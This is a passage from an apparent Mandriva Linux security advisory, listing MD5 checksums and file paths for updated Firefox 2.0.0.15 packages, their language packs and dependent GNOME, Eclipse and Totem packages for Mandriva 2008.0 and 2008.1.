2008.0/i586/gnome-python-gtkmozembed-2.19.1-4.6mdv2008.0.i586.rpm 74ef37ac4cd60da9a4bd35a38616f706 2008.0/i586/gnome-python-gtkspell-2.19.1-4.6mdv2008.0.i586.rpm 7e48a15f5610c089de7d93c27144d5b3 2008.0/i586/libdevhelp-1_0-0.16-1.6mdv2008.0.i586.rpm 764ed44ecb620d4eee58457b70b9f0dc 2008.0/i586/libdevhelp-1-devel-0.16-1.6mdv2008.0.i586.rpm 4aff03ae12039c0038fd870a59e2bc75 2008.0/i586/libmozilla-firefox2.0.0.15-2.0.0.15-1.1mdv2008.0.i586.rpm d4361208482cf12ed6314fba5fcf789d 2008.0/i586/libmozilla-firefox-devel-2.0.0.15-1.1mdv2008.0.i586.rpm e7e0caa5dcc8357d14fd9a112d43baa7 2008.0/i586/libswt3-gtk2-3.3.0-0.20.8.6mdv2008.0.i586.rpm 7d17cc4df315ceb01fe0f5989de50ded 2008.0/i586/libtotem-plparser7-2.20.1-1.5mdv2008.0.i586.rpm c562f93dc17a058a6fc556f8258ab305 2008.0/i586/libtotem-plparser-devel-2.20.1-1.5mdv2008.0.i586.rpm 5e13439b164601a198f6e31d75016f23 2008.0/i586/mozilla-firefox-2.0.0.15-1.1mdv2008.0.i586.rpm d43aaed7d43a80a7ce9ad49c1ca54368 2008.0/i586/mozilla-firefox-af-2.0.0.15-1mdv2008.0.i586.rpm f4958d91de02d7ce6325e36ef3bc5c7b 2008.0/i586/mozilla-firefox-ar-2.0.0.15-1mdv2008.0.i586.rpm 25a64afb495ad125f5464cfdff125daf 2008.0/i586/mozilla-firefox-be-2.0.0.15-1mdv2008.0.i586.rpm 03651b648c653214af81944b620c35a6 2008.0/i586/mozilla-firefox-bg-2.0.0.15-1mdv2008.0.i586.rpm 13dde650c44a2b18232e7fc616f345e5 2008.0/i586/mozilla-firefox-br_FR-2.0.0.15-1mdv2008.0.i586.rpm 75e7dd0a981bc19332e47354314003db 2008.0/i586/mozilla-firefox-ca-2.0.0.15-1mdv2008.0.i586.rpm b0f38ff79d8f257c66fedb498c857b3a 2008.0/i586/mozilla-firefox-cs-2.0.0.15-1mdv2008.0.i586.rpm b8e305b9009601f44db77c8d5b5c5454 2008.0/i586/mozilla-firefox-da-2.0.0.15-1mdv2008.0.i586.rpm 54219c8250f651e7fcb83f6ceef0d9ec 2008.0/i586/mozilla-firefox-de-2.0.0.15-1mdv2008.0.i586.rpm e391d268c6a26974b5102a5142cb49c0 2008.0/i586/mozilla-firefox-el-2.0.0.15-1mdv2008.0.i586.rpm 9c7d16404d9c007b8781891211daedfe 2008.0/i586/mozilla-firefox-en_GB-2.0.0.15-1mdv2008.0.i586.rpm 253ed922f0f45259d17f75808d8bc160 2008.0/i586/mozilla-firefox-es_AR-2.0.0.15-1mdv2008.0.i586.rpm 8754e91e1380205b3ca41e1c0a63a101 2008.0/i586/mozilla-firefox-es_ES-2.0.0.15-1mdv2008.0.i586.rpm bf42d8045ce8fc7a83ca868b90d769bb 2008.0/i586/mozilla-firefox-et_EE-2.0.0.15-1mdv2008.0.i586.rpm 2454ccd53d817b4bb3f5f603d5c87f91 2008.0/i586/mozilla-firefox-eu-2.0.0.15-1mdv2008.0.i586.rpm 01a72cbce231f51bb2ed1632425acb9b 2008.0/i586/mozilla-firefox-ext-blogrovr-1.1.779-2mdv2008.0.i586.rpm a317332d6f06dbd422bb0a658418370f 2008.0/i586/mozilla-firefox-ext-foxmarks-2.0.47.4-2mdv2008.0.i586.rpm ce67fe47de9eb30b4b4aaa90f9151ca8 2008.0/i586/mozilla-firefox-ext-scribefire-2.2.7-2mdv2008.0.i586.rpm 870f4f775b1f7000d431debf97fd6ac4 2008.0/i586/mozilla-firefox-fi-2.0.0.15-1mdv2008.0.i586.rpm bd63fb19d1a91394d939554ea13f00e3 2008.0/i586/mozilla-firefox-fr-2.0.0.15-1mdv2008.0.i586.rpm 2f8441eb41e9e27a176b1251ba0c05c5 2008.0/i586/mozilla-firefox-fy-2.0.0.15-1mdv2008.0.i586.rpm 29a11ab337139defcb7cef3006af21e3 2008.0/i586/mozilla-firefox-ga-2.0.0.15-1mdv2008.0.i586.rpm e812c086bec3702ba98656e9e9d0fa25 2008.0/i586/mozilla-firefox-gu_IN-2.0.0.15-1mdv2008.0.i586.rpm 6cfa7117d05ed3126330a0e7397bd0ed 2008.0/i586/mozilla-firefox-he-2.0.0.15-1mdv2008.0.i586.rpm d35ebca5ff13e3db6d1e846127f755b0 2008.0/i586/mozilla-firefox-hu-2.0.0.15-1mdv2008.0.i586.rpm ffbf987a34a3175d5cbeb43a7ba8bc76 2008.0/i586/mozilla-firefox-it-2.0.0.15-1mdv2008.0.i586.rpm 4b4cc732d7e153fde6d91abc414204e0 2008.0/i586/mozilla-firefox-ja-2.0.0.15-1mdv2008.0.i586.rpm d00a0ee8ea9ba1fc28d1808b1cccae7c 2008.0/i586/mozilla-firefox-ka-2.0.0.15-1mdv2008.0.i586.rpm b37cd7367692ccdde90c0f653e81db4f 2008.0/i586/mozilla-firefox-ko-2.0.0.15-1mdv2008.0.i586.rpm c244e55348ec4a6b9b1a59d39b5cf864 2008.0/i586/mozilla-firefox-ku-2.0.0.15-1mdv2008.0.i586.rpm 9b6e693896f44e354dc97934c4a6f9bc 2008.0/i586/mozilla-firefox-lt-2.0.0.15-1mdv2008.0.i586.rpm ca8792100579e8e864c68045c8e33dab 2008.0/i586/mozilla-firefox-mk-2.0.0.15-1mdv2008.0.i586.rpm bc3d210478bbeba94a130ddce2cd4e20 2008.0/i586/mozilla-firefox-mn-2.0.0.15-1mdv2008.0.i586.rpm 86c1b2594f90e6590c50850f92ed9fa9 2008.0/i586/mozilla-firefox-nb_NO-2.0.0.15-1mdv2008.0.i586.rpm 3a2fe70186331ef849a006b269178841 2008.0/i586/mozilla-firefox-nl-2.0.0.15-1mdv2008.0.i586.rpm 44101392826da41e39df284c5db7a5c3 2008.0/i586/mozilla-firefox-nn_NO-2.0.0.15-1mdv2008.0.i586.rpm cf8d7632969dfce6b13b2ab29903380a 2008.0/i586/mozilla-firefox-pa_IN-2.0.0.15-1mdv2008.0.i586.rpm 773b8b2ef24b2f7dd5678495f5e95e4f 2008.0/i586/mozilla-firefox-pl-2.0.0.15-1mdv2008.0.i586.rpm 8d648e3b51c805a7633b2fe0ba2b7119 2008.0/i586/mozilla-firefox-pt_BR-2.0.0.15-1mdv2008.0.i586.rpm 27c29c7aeb0bafb8ee0a382d14a7e2ed 2008.0/i586/mozilla-firefox-pt_PT-2.0.0.15-1mdv2008.0.i586.rpm 66b544677d64b50ff7b9e6d000241ce6 2008.0/i586/mozilla-firefox-ro-2.0.0.15-1mdv2008.0.i586.rpm cf08c3debe01934b728831e2551c3a70 2008.0/i586/mozilla-firefox-ru-2.0.0.15-1mdv2008.0.i586.rpm 05d470a2c4d01b54f7c859c8af5e1429 2008.0/i586/mozilla-firefox-sk-2.0.0.15-1mdv2008.0.i586.rpm d6ef4b7ff819b473500c299fe1903963 2008.0/i586/mozilla-firefox-sl-2.0.0.15-1mdv2008.0.i586.rpm f0d859fa021f946f9cae840b5608a47b 2008.0/i586/mozilla-firefox-sv_SE-2.0.0.15-1mdv2008.0.i586.rpm dbd3b10b4d340538e7b599cc6caa6175 2008.0/i586/mozilla-firefox-tr-2.0.0.15-1mdv2008.0.i586.rpm 59e2c389f997cd5c09a3ebb777952463 2008.0/i586/mozilla-firefox-uk-2.0.0.15-1mdv2008.0.i586.rpm 0d8307bd325467eda1239934277f0d16 2008.0/i586/mozilla-firefox-zh_CN-2.0.0.15-1mdv2008.0.i586.rpm 7b02a34bf3697adb3f88ca26db7b1f73 2008.0/i586/mozilla-firefox-zh_TW-2.0.0.15-1mdv2008.0.i586.rpm 10268657f68e028723ec3b002b6a5b83 2008.0/i586/totem-2.20.1-1.5mdv2008.0.i586.rpm b3bf83096ab553c2c803559abc0551af 2008.0/i586/totem-common-2.20.1-1.5mdv2008.0.i586.rpm 1a2ca6f96aaa869a60dcba37b38a5cb0 2008.0/i586/totem-gstreamer-2.20.1-1.5mdv2008.0.i586.rpm ea1f336df7298b82decb503b832c8517 2008.0/i586/totem-mozilla-2.20.1-1.5mdv2008.0.i586.rpm 3038302810942a88bef6aa96c4e3c08d 2008.0/i586/totem-mozilla-gstreamer-2.20.1-1.5mdv2008.0.i586.rpm 2044a0e1f4554e5144ef7c35e3d492a1 2008.0/i586/yelp-2.20.0-3.5mdv2008.0.i586.rpm 6b7e935872d843d8a66826d6f93b5c1a 2008.0/SRPMS/devhelp-0.16-1.6mdv2008.0.src.rpm 8db2fcf79f0a0e3820a2a98d10efdb5d 2008.0/SRPMS/eclipse-3.3.0-0.20.8.6mdv2008.0.src.rpm 9c95e6b81406a4b7d3fb8f5d9243c787 2008.0/SRPMS/epiphany-2.20.0-1.6mdv2008.0.src.rpm 7d2663659d636cabc92d0dd05e4712fb 2008.0/SRPMS/galeon-2.0.3-7.6mdv2008.0.src.rpm a40949f099e226e96869da54af4e3272 2008.0/SRPMS/gnome-python-extras-2.19.1-4.6mdv2008.0.src.rpm f9ba631cdbdb25b92d7bc3d0f568a5d0 2008.0/SRPMS/mozilla-firefox-2.0.0.15-1.1mdv2008.0.src.rpm e8436c7be53c27319d1d7674376c25ac 2008.0/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-2mdv2008.0.src.rpm 6f69cda328c5fba6f764a6d426c63a75 2008.0/SRPMS/mozilla-firefox-ext-foxmarks-2.0.47.4-2mdv2008.0.src.rpm 222784ba3b5d3441828a839d6ad686a8 2008.0/SRPMS/mozilla-firefox-ext-scribefire-2.2.7-2mdv2008.0.src.rpm feb23780b9cc4068e64f4482c848ddf2 2008.0/SRPMS/mozilla-firefox-l10n-2.0.0.15-1mdv2008.0.src.rpm da1c616b5147bade71c7a2c91d5ffaef 2008.0/SRPMS/totem-2.20.1-1.5mdv2008.0.src.rpm d362c818c8e312b0311b7ed6f1a88426 2008.0/SRPMS/yelp-2.20.0-3.5mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 9db60f1b650308add3614b7885203b12 2008.0/x86_64/devhelp-0.16-1.6mdv2008.0.x86_64.rpm c43234b155de4b10dfb40b99a9ba8169 2008.0/x86_64/devhelp-plugins-0.16-1.6mdv2008.0.x86_64.rpm e8eb6c9b3570792c874e98d80b45be9a 2008.0/x86_64/eclipse-cvs-client-3.3.0-0.20.8.6mdv2008.0.x86_64.rpm 9a642dd5c029f3d4c9c3b6e3b627d582 2008.0/x86_64/eclipse-ecj-3.3.0-0.20.8.6mdv2008.0.x86_64.rpm 83a757e46e13c567984db1a8d6108919 2008.0/x86_64/eclipse-jdt-3.3.0-0.20.8.6mdv2008.0.x86_64.rpm 1b03699e25cf1041b9621178df8f9095 2008.0/x86_64/eclipse-pde-3.3.0-0.20.8.6mdv2008.0.x86_64.rpm 940f56b7c782db3c9387bf23bf0c5c21 2008.0/x86_64/eclipse-pde-runtime-3.3.0-0.20.8.6mdv2008.0.x86_64.rpm 9c5b8fc8e69e932ff12b8c44664113a5 2008.0/x86_64/eclipse-platform-3.3.0-0.20.8.6mdv2008.0.x86_64.rpm f05d0a7218045efeb9fe088eb5cc0cac 2008.0/x86_64/eclipse-rcp-3.3.0-0.20.8.6mdv2008.0.x86_64.rpm 24e9c815359a22ae7437c49e3ff02265 2008.0/x86_64/epiphany-2.20.0-1.6mdv2008.0.x86_64.rpm d129a5b63074a6d761d7e096782caa0c 2008.0/x86_64/epiphany-devel-2.20.0-1.6mdv2008.0.x86_64.rpm 8064f6399776227e018429ec63d18f30 2008.0/x86_64/galeon-2.0.3-7.6mdv2008.0.x86_64.rpm 4ac72fee49e3e64184b1e3081852c1c0 2008.0/x86_64/gnome-python-extras-2.19.1-4.6mdv2008.0.x86_64.rpm ba51b5db3361d64a9d68726fb1f449bf 2008.0/x86_64/gnome-python-gda-2.19.1-4.6mdv2008.0.x86_64.rpm 8f72e6ef9cf912367d28ae48524ab5b0 2008.0/x86_64/gnome-python-gda-devel-2.19.1-4.6mdv2008.0.x86_64.rpm 74c7902d814ac84415b0b5d55c4606f2 2008.0/x86_64/gnome-python-gdl-2.19.1-4.6mdv2008.0.x86_64.rpm 8ebb07c5e266e13adebdc8958fb047e2 2008.0/x86_64/gnome-python-gksu-2.19.1-4.6mdv2008.0.x86_64.rpm 822c86eb6e1122885c7c496ae877485e 2008.0/x86_64/gnome-python-gtkhtml2-2.19.1-4.6mdv2008.0.x86_64.rpm 1088fe484fa59794be5ce82f6c25b411 2008.0/x86_64/gnome-python-gtkmozembed-2.19.1-4.6mdv2008.0.x86_64.rpm b3ffe742c992d70d87d628825ae5cc6b 2008.0/x86_64/gnome-python-gtkspell-2.19.1-4.6mdv2008.0.x86_64.rpm fc8be2ab653f190d74c5d99d00821bb9 2008.0/x86_64/lib64devhelp-1_0-0.16-1.6mdv2008.0.x86_64.rpm b8c5abf8c5bae0227e9eb05b30d461bf 2008.0/x86_64/lib64devhelp-1-devel-0.16-1.6mdv2008.0.x86_64.rpm e1aafc16da477e767f459d25923da87e 2008.0/x86_64/lib64mozilla-firefox2.0.0.15-2.0.0.15-1.1mdv2008.0.x86_64.rpm 3bc70f2860a8b320bfb4006ee2c62b64 2008.0/x86_64/lib64mozilla-firefox-devel-2.0.0.15-1.1mdv2008.0.x86_64.rpm 5a9b0b0d557bfb1d890f6b84f8f51dd0 2008.0/x86_64/lib64totem-plparser7-2.20.1-1.5mdv2008.0.x86_64.rpm 41fa072154b934683a262459c5779c40 2008.0/x86_64/lib64totem-plparser-devel-2.20.1-1.5mdv2008.0.x86_64.rpm 6ef870f2642602052a5525ec584c46f7 2008.0/x86_64/libswt3-gtk2-3.3.0-0.20.8.6mdv2008.0.x86_64.rpm e7160e94222e4d592fb02ab048b8f38f 2008.0/x86_64/mozilla-firefox-2.0.0.15-1.1mdv2008.0.x86_64.rpm c73ed03efb0af1e4b00c635cc57d0623 2008.0/x86_64/mozilla-firefox-af-2.0.0.15-1mdv2008.0.x86_64.rpm bf1e59d25616c78d40e20ef140957343 2008.0/x86_64/mozilla-firefox-ar-2.0.0.15-1mdv2008.0.x86_64.rpm 320b8b7b56f8e51566deec961198c676 2008.0/x86_64/mozilla-firefox-be-2.0.0.15-1mdv2008.0.x86_64.rpm c5d1444f52fe457d0484af9800688ece 2008.0/x86_64/mozilla-firefox-bg-2.0.0.15-1mdv2008.0.x86_64.rpm 1b5baad19f51ed4ace67ba49c17a4d26 2008.0/x86_64/mozilla-firefox-br_FR-2.0.0.15-1mdv2008.0.x86_64.rpm b8e70486a901f973f4d3c0f2c4fc82f1 2008.0/x86_64/mozilla-firefox-ca-2.0.0.15-1mdv2008.0.x86_64.rpm 11c6208996ae87c67fa07d7a29a6acc5 2008.0/x86_64/mozilla-firefox-cs-2.0.0.15-1mdv2008.0.x86_64.rpm 5574f35e708d427d2eb71e44dd9934b1 2008.0/x86_64/mozilla-firefox-da-2.0.0.15-1mdv2008.0.x86_64.rpm ec9be10921c7c097b4daf51da27dd94d 2008.0/x86_64/mozilla-firefox-de-2.0.0.15-1mdv2008.0.x86_64.rpm 0811394baa7b068ac09c3615e0e95a4f 2008.0/x86_64/mozilla-firefox-el-2.0.0.15-1mdv2008.0.x86_64.rpm ae46d8d86e180d9fa30d594d98ff6236 2008.0/x86_64/mozilla-firefox-en_GB-2.0.0.15-1mdv2008.0.x86_64.rpm 514253b79493035c8288c0148a9d2a7b 2008.0/x86_64/mozilla-firefox-es_AR-2.0.0.15-1mdv2008.0.x86_64.rpm 91a1ca7b08069ea8088f685830707f5b 2008.0/x86_64/mozilla-firefox-es_ES-2.0.0.15-1mdv2008.0.x86_64.rpm 6d1a645f6f3dc6be54f01ac18c7f38f9 2008.0/x86_64/mozilla-firefox-et_EE-2.0.0.15-1mdv2008.0.x86_64.rpm 9cdeb498f750f3033f5898c8b1a3a7ab 2008.0/x86_64/mozilla-firefox-eu-2.0.0.15-1mdv2008.0.x86_64.rpm 8b4011b76f0919dffc7bdd61dd2c36e3 2008.0/x86_64/mozilla-firefox-ext-blogrovr-1.1.779-2mdv2008.0.x86_64.rpm a4a33251415241da9714f52d8bfd600b 2008.0/x86_64/mozilla-firefox-ext-foxmarks-2.0.47.4-2mdv2008.0.x86_64.rpm 90ff29046bcb94de98792176c520d81b 2008.0/x86_64/mozilla-firefox-ext-scribefire-2.2.7-2mdv2008.0.x86_64.rpm cef6c768633aef6689f90e81774813b2 2008.0/x86_64/mozilla-firefox-fi-2.0.0.15-1mdv2008.0.x86_64.rpm 8f6ccdd9a6bfab1d7f225bd62a4bdd31 2008.0/x86_64/mozilla-firefox-fr-2.0.0.15-1mdv2008.0.x86_64.rpm 54c430c3586d7c29324aa93e9069b72d 2008.0/x86_64/mozilla-firefox-fy-2.0.0.15-1mdv2008.0.x86_64.rpm 223c8810fa3731fe683c78462eed6c0b 2008.0/x86_64/mozilla-firefox-ga-2.0.0.15-1mdv2008.0.x86_64.rpm e75d03e83e3c37a0fc959eef515ceabf 2008.0/x86_64/mozilla-firefox-gu_IN-2.0.0.15-1mdv2008.0.x86_64.rpm be79be25fee381278b40802015603abe 2008.0/x86_64/mozilla-firefox-he-2.0.0.15-1mdv2008.0.x86_64.rpm c7887d7a3d54f84f26608dd41f2d6a57 2008.0/x86_64/mozilla-firefox-hu-2.0.0.15-1mdv2008.0.x86_64.rpm 0dbc51b47b3cb799b2fa2799ae5968f2 2008.0/x86_64/mozilla-firefox-it-2.0.0.15-1mdv2008.0.x86_64.rpm 48f185e52a1774dd1be7de992ffe696c 2008.0/x86_64/mozilla-firefox-ja-2.0.0.15-1mdv2008.0.x86_64.rpm a377b80c0aadc8f057065c6b4d7b1ca2 2008.0/x86_64/mozilla-firefox-ka-2.0.0.15-1mdv2008.0.x86_64.rpm 1592f38ee9cd348d1e5b09104840480d 2008.0/x86_64/mozilla-firefox-ko-2.0.0.15-1mdv2008.0.x86_64.rpm 7690f91bbe933bc5a687086548c0079b 2008.0/x86_64/mozilla-firefox-ku-2.0.0.15-1mdv2008.0.x86_64.rpm b5ddeaef9839f4b7a9144fb2162ebe62 2008.0/x86_64/mozilla-firefox-lt-2.0.0.15-1mdv2008.0.x86_64.rpm 64bc32942af8947673f9cf31c12faadd 2008.0/x86_64/mozilla-firefox-mk-2.0.0.15-1mdv2008.0.x86_64.rpm 7ea5f185d50f6a5028d20cf11464598d 2008.0/x86_64/mozilla-firefox-mn-2.0.0.15-1mdv2008.0.x86_64.rpm a50b47ca5e252174c7bb6e03a6fbf891 2008.0/x86_64/mozilla-firefox-nb_NO-2.0.0.15-1mdv2008.0.x86_64.rpm 7d1acf2c8b6593f5c541b2ef228d7e55 2008.0/x86_64/mozilla-firefox-nl-2.0.0.15-1mdv2008.0.x86_64.rpm 05a9d2ce610ff3020a560423b08c162e 2008.0/x86_64/mozilla-firefox-nn_NO-2.0.0.15-1mdv2008.0.x86_64.rpm fbdbc149d08e37cac49d4dbeecdeff8f 2008.0/x86_64/mozilla-firefox-pa_IN-2.0.0.15-1mdv2008.0.x86_64.rpm b442a3b1e0b81f55dc0cf7a1aa490dd4 2008.0/x86_64/mozilla-firefox-pl-2.0.0.15-1mdv2008.0.x86_64.rpm 14028c80bf8b09013fdba31266690365 2008.0/x86_64/mozilla-firefox-pt_BR-2.0.0.15-1mdv2008.0.x86_64.rpm 720581be5807e70501a3a9e936d6dc44 2008.0/x86_64/mozilla-firefox-pt_PT-2.0.0.15-1mdv2008.0.x86_64.rpm 12c1964802a87b71de32f81a0d4638d1 2008.0/x86_64/mozilla-firefox-ro-2.0.0.15-1mdv2008.0.x86_64.rpm eae3778c6ca7a5ea8bb96e0fa37c2b8c 2008.0/x86_64/mozilla-firefox-ru-2.0.0.15-1mdv2008.0.x86_64.rpm af7fe09f3aeb0f36853915f1adab3ba0 2008.0/x86_64/mozilla-firefox-sk-2.0.0.15-1mdv2008.0.x86_64.rpm 045266577ecea5c0973ea5515834ffb7 2008.0/x86_64/mozilla-firefox-sl-2.0.0.15-1mdv2008.0.x86_64.rpm fb16c935c8bb9410dcc6eb1b52f899ab 2008.0/x86_64/mozilla-firefox-sv_SE-2.0.0.15-1mdv2008.0.x86_64.rpm bb5c5691a06653e2647c47a3e18a777f 2008.0/x86_64/mozilla-firefox-tr-2.0.0.15-1mdv2008.0.x86_64.rpm ebfeca1b51336ae7dab1dd0467c62569 2008.0/x86_64/mozilla-firefox-uk-2.0.0.15-1mdv2008.0.x86_64.rpm 6a03f5a74d4f632944dcfece5b3b1c26 2008.0/x86_64/mozilla-firefox-zh_CN-2.0.0.15-1mdv2008.0.x86_64.rpm 328419efa5814fb052689a7b7b30a874 2008.0/x86_64/mozilla-firefox-zh_TW-2.0.0.15-1mdv2008.0.x86_64.rpm 6d5f3d6c81eee5c62f9e8c992102830a 2008.0/x86_64/totem-2.20.1-1.5mdv2008.0.x86_64.rpm 6ddcc6a17cc3523033bc160e9c488832 2008.0/x86_64/totem-common-2.20.1-1.5mdv2008.0.x86_64.rpm 805cbef8aef3e897a27ca09115a36de3 2008.0/x86_64/totem-gstreamer-2.20.1-1.5mdv2008.0.x86_64.rpm 7f18397fd9c1831757833f3ce55fd490 2008.0/x86_64/totem-mozilla-2.20.1-1.5mdv2008.0.x86_64.rpm ac94a1de03d30d1d242ebd6084366a13 2008.0/x86_64/totem-mozilla-gstreamer-2.20.1-1.5mdv2008.0.x86_64.rpm c7ac019fd5186e938933c37fc9aecce8 2008.0/x86_64/yelp-2.20.0-3.5mdv2008.0.x86_64.rpm 6b7e935872d843d8a66826d6f93b5c1a 2008.0/SRPMS/devhelp-0.16-1.6mdv2008.0.src.rpm 8db2fcf79f0a0e3820a2a98d10efdb5d 2008.0/SRPMS/eclipse-3.3.0-0.20.8.6mdv2008.0.src.rpm 9c95e6b81406a4b7d3fb8f5d9243c787 2008.0/SRPMS/epiphany-2.20.0-1.6mdv2008.0.src.rpm 7d2663659d636cabc92d0dd05e4712fb 2008.0/SRPMS/galeon-2.0.3-7.6mdv2008.0.src.rpm a40949f099e226e96869da54af4e3272 2008.0/SRPMS/gnome-python-extras-2.19.1-4.6mdv2008.0.src.rpm f9ba631cdbdb25b92d7bc3d0f568a5d0 2008.0/SRPMS/mozilla-firefox-2.0.0.15-1.1mdv2008.0.src.rpm e8436c7be53c27319d1d7674376c25ac 2008.0/SRPMS/mozilla-firefox-ext-blogrovr-1.1.779-2mdv2008.0.src.rpm 6f69cda328c5fba6f764a6d426c63a75 2008.0/SRPMS/mozilla-firefox-ext-foxmarks-2.0.47.4-2mdv2008.0.src.rpm 222784ba3b5d3441828a839d6ad686a8 2008.0/SRPMS/mozilla-firefox-ext-scribefire-2.2.7-2mdv2008.0.src.rpm feb23780b9cc4068e64f4482c848ddf2 2008.0/SRPMS/mozilla-firefox-l10n-2.0.0.15-1mdv2008.0.src.rpm da1c616b5147bade71c7a2c91d5ffaef 2008.0/SRPMS/totem-2.20.1-1.5mdv2008.0.src.rpm d362c818c8e312b0311b7ed6f1a88426 2008.0/SRPMS/yelp-2.20.0-3.5mdv2008.0.src.rpm Mandriva Linux 2008.1: 6e47023193c6c8e0f33e87075a77acd4 2008.1/i586/devhelp-0.19-3.2mdv2008.1.i586.rpm a835fafecd7e40c337cf24dd380d3590 2008.1/i586/devhelp-plugins-0.19-3.2mdv2008.1.i586.rpm 8fe22458762d4502d4827aee19ad0c18 2008.1/i586/epiphany-2.22.0-4.2mdv2008.1.i586.rpm cf52ca44e4b0a9f47695c78aa1e58e5e 2008.1/i586/epiphany-devel-2.22.0-4.2mdv2008.1.i586.rpm 42234a0eb5f595240ab14ecd04e5616b 2008.1/i586/galeon-2.0.4-3.2mdv2008.1.i586.rpm 0b13dcc6aea5b22f3e49b122b6ac7b43 2008.1/i586/gnome-python-extras-2.19.1-10.2mdv2008.1.i586.rpm ff255ac31801091172d70821e692ba13 2008.1/i586/gnome-python-gda-2.19.1-10.2mdv2008.1.i586.rpm e10fae6944b13efc54f10193bd1b369b 2008.1/i586/gnome-python-gda-devel-2.19.1-10.2mdv2008.1.i586.rpm 03a02cd1a7e183bdce9377a0e6dbf539 2008.1/i586/gnome-python-gdl-2.19.1-10.2mdv2008.1.i586.rpm 2631d97342ffec4ec292a7a1342a502a 2008.1/i586/gnome-python-gksu-2.19.1-10.2mdv2008.1.i586.rpm 793a221a74a01a8e6a0d5736b914a8e8 2008.1/i586/gnome-python-gtkhtml2-2.19.1-10.2mdv2008.1.i586.rpm 930842265e8ab89cbe48bfdfdea0684d 2008.1/i586/gnome-python-gtkmozembed-2.19.1-10.2mdv2008.1.i586.rpm a1b50ae4d53ddaa3e385a6402cdeac4c 2008.1/i586/gnome-python-gtkspell-2.19.1-10.2mdv2008.1.i586.rpm 9c66e0fdef4add5c19e2c07ce639d1fa 2008.1/i586/libdevhelp-1_0-0.19-3.2mdv2008.1.i586.rpm 9880e943cd0490f161b4092e0ee008ab 2008.1/i586/libdevhelp-1-devel-0.19-3.2mdv2008.1.i586.rpm 43943721d66d7d0f8b015b19d856ea40 2008.1/i586/libgluezilla0-1.2.6.1-2.2mdv2008.1.i586.rpm 9bf2a54fb437f51b24c526ea9c7e0c93 2008.1/i586/libmozilla-firefox2.0.0.15-2.0.0.15-1.1mdv2008.1.i586.rpm 9e9b2fae069594669b67594f5c628b98 2008.1/i586/libmozilla-firefox-devel-2.0.0.15-1.1mdv2008.1.i586.rpm f1bbd57d2b4f4126c45a811b8bec8167 2008.1/i586/mozilla-firefox-2.0.0.15-1.1mdv2008.1.i586.rpm 1b26557de936cdade4fbbe71bfbe2469 2008.1/i586/mozilla-firefox-af-2.0.0.15-1mdv2008.1.i586.rpm 71bee32a0d25a1132dd69e8cd9ef0c17 2008.1/i586/mozilla-firefox-ar-2.0.0.15-1mdv2008.1.i586.rpm 5517db43288cb5f8bb95949679fc392f 2008.1/i586/mozilla-firefox-be-2.0.0.15-1mdv2008.1.i586.rpm 587877a454f6d624144779f9d9c9e0fd 2008.1/i586/mozilla-firefox-bg-2.0.0.15-1mdv2008.1.i586.rpm 62bd35ab38cb0d1ebd88dcb69b30c3bf 2008.1/i586/mozilla-firefox-br_FR-2.0.0.15-1mdv2008.1.i586.rpm 0eab4cc1f029d51715048d71a1477123 2008.1/i586/mozilla-firefox-ca-2.0.0.15-1mdv2008.1.i586.rpm cae761e30b9b5263f80e0267011920ef 2008.1/i586/mozilla-firefox-cs-2.0.0.15-1mdv2008.1.i586.rpm 098c7ac00042f4a98e08d773e7bd6888 2008.1/i586/mozilla-firefox-da-2.0.0.15-1mdv2008.1.i586.rpm 72f703019ee02698d3e03a495f5fa63a 2008.1/i586/mozilla-firefox-de-2.0.0.15-1mdv2008.1.i586.rpm e88b733e476eb2a690cda71bdf6a4809 2008.1/i586/mozilla-firefox-el-2.0.0.15-1mdv2008.1.i586.rpm 167da23ed6afb5c4f085dabd6ff79225 2008.1/i586/mozilla-firefox-en_GB-2.0.0.15-1mdv2008.1.i586.rpm b052a809947543f53f299a399f59e7be 2008.1/i586/mozilla-firefox-es_AR-2.0.0.15-1mdv2008.1.i586.rpm 8544caea86837432ce9dcb51e9dce001 2008.1/i586/mozilla-firefox-es_ES-2.0.0.15-1mdv2008.1.i586.rpm 0a9d2e3e82c873fdc7b7d52d11dff10e 2008.1/i586/mozilla-firefox-et_EE-2.0.0.15-1mdv2008.1.i586.rpm 5c1bdcec6b0b769d62836270f4f73718 2008.1/i586/mozilla-firefox-eu-2.0.0.15-1mdv2008.1.i586.rpm be019017361a033c2a3c1d5ecb84b7c2 2008.1/i586/mozilla-firefox-ext-blogrovr-1.1.779-2mdv2008.1.i586.rpm 4cb32f3bf0243edd025199a58c715400 2008.1/i586/mozilla-firefox-ext-foxmarks-2.0.47.4-2mdv2008.1.i586.rpm 4bd9cf7fcb88d95b50a4244cadb807ed 2008.1/i586/mozilla-firefox-ext-scribefire-2.2.7-2mdv2008.1.i586.rpm 728819425ec211463565aabd5d781b0e 2008.1/i586/mozilla-firefox-fi-2.0.0.15-1mdv2008.1.i586.rpm 9857e4a736412c1bc08f661f28d2150b 2008.1/i586/mozilla-firefox-fr-2.0.0.15-1mdv2008.1.i586.rpm 96260e7f8bb855d816b75bb2f2302e2a 2008.1/i586/mozilla-firefox-fy-2.0.0.15-1mdv2008.1.i586.rpm ba6191c211ccb4594144640e65c09732 2008.1/i586/mozilla-firefox-ga-2.0.0.15-1mdv2008.1.i586.rpm ef76ab95e91b96783f4a3c58e0cb84dc 2008.1/i586/mozilla-firefox-gnome-support-2.0.0.15-1.1mdv2008.1.i586.rpm 7c26a187c7ddfdfde568b9e3bcf563e6 2008.1/i586/mozilla-firefox-gu_IN-2.0.0.15-1mdv2008.1.i586.rpm 820d16cc2052e418bfcec2dc141a4882 2008.1/i586/mozilla-firefox-he-2.0.0.15-1mdv2008.1.i586.rpm 14501eccfae31110c7295ac5648f0379 2008.1/i586/mozilla-firefox-hu-2.0.0.15-1mdv2008.1.i586.rpm 2faf0e1e4d6b35eb08a37b33acec96f1 2008.1/i586/mozilla-firefox-it-2.0.0.15-1mdv2008.1.i586.rpm 4d6a5bcaa23a9a7904b69193f701e67e 2008.1/i586/mozilla-firefox-ja-2.0.0.15-1mdv2008.1.i586.rpm c7f6daf0b54321b4a1da17239234acfe 2008.1/i586/mozilla-firefox-ka-2.0.0.15-1mdv2008.1.i586.rpm 4366d21f3c74607be831e905cd926510 2008.1/i586/mozilla-firefox-ko-2.0.0.15-1mdv2008.1.i586.rpm 430ad47f2ff5d5f9c9ff4ac5d58b320b 2008.1/i586/mozilla-firefox-ku-2.0.0.15-1mdv2008.1.i586.rpm 7eb60eb9a275041ec570369c8945c56f 